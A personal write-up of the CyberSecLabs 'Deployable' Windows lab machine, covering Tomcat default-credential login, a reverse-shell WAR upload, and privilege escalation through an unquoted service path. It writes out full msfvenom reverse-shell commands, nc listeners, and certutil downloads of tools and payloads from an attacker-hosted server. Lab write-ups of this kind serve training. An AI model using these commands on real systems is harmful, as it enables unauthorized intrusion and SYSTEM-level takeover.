CyberSecLabs-Deployable
This is my 7th write up and I will be discussing my experience with the machine “Deployable” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to boost their skills to take on the OSCP. This was a beginner level Windows machine and I found it quite challenging. This box taught me a lot when it comes to exploiting windows services. Default tomcat credentials are discovered from a 401 error which then leads to a reverse shell war file upload. Then, an unquoted service path exploit lands me into admin.
Step 1: Enumeration
I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts -sC and version detection -sV. The second scan gave me some other open ports that led to a rabbit hole so I stuck with the results from the first scan.
After enumerating the obvious ports from top to bottom, port 8080 became of interest running tomcat. When visiting http://172.31.1.13:8080 I was presented with the tomcat default configuration page. I clicked on the manager tab and it prompted for a password.
After a couple of failed attempts I hit cancel and it brought me to a page with a 401 Unauthorized error. The page presented some default credential examples and sure enough when I tested them back on the manager login prompt it worked!
Step 2: Exploitation
Having tomcat manager I saw that we can upload/deploy files. I created a reverse shell WAR file using msfvenom and setup a nc listener to grab the connection when uploaded.
On Kali Machine:
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=yourip LPORT=6666 -f war > sin.warsudo nc -lvp 6666
Once I uploaded the war file I created with msfvenom I visited the directory with the name of my file.
http://172.31.1.13:8080/sinStep 3: Post Exploitation
Going back to my kali machine we can see I captured the reverse connection giving me user tomcat.
After trying different priv-esc enumeration scripts I found winPEAS super helpful.
I pushed it to the box by using the following commands within the same directory my winPEAS batch file resided:
On my Kali Machine:
sudo python -m SimpleHTTPServer 80On the Windows box:
certutil.exe -urlcache -split -f "http://yourip:80/winPEAS.bat"I then ran the file on the windows machine:
winPEAS.batUnquoted service paths caught my eye when analyzing the script results. When a service is created whose executable path contains spaces and isn’t enclosed within quotes it leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Testing each path by trying to cd into each one until I cannot this lets me know that I can write to that specific path. I tested each one until I hit \Service Files where I could not land into. This let me know that \Deploy Ready is writable.
Example:
cd "C:\Program Files"cd Depl*
I went back to my kali machine and created a reverse shell to upload into this writable directory.
On Kali Machine:
sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=youriphere LPORT=1234 -f exe > sin.exeNow I followed the same method explained above and pushed the file with my python simple server and grabbed it with certutil but this time I added Service.exe to the end of the command. You may need to kill your last running python server and start it in the directory you made your msfvenom file with.
On my Kali Machine:
sudo python -m SimpleHTTPServer 80On the Windows box:
certutil.exe -urlcache -split -f "http://yourip:80/sin.exe" Service.exeHaving baked Service.exe to the end of the above command lets us attach to .exe file we made to the service. I then started another netcat listener on my machine but with a different port with the one I specified with the .exe file I made with msfvenom.
On My Kali Machine:
sudo nc -lvp 1234Now I need to start the service on the windows machine and grab the reverse connection back.
On the Windows Machine:
sc start DeployGoing back to my machine I grabbed the connection from starting the service granting me full admin access.
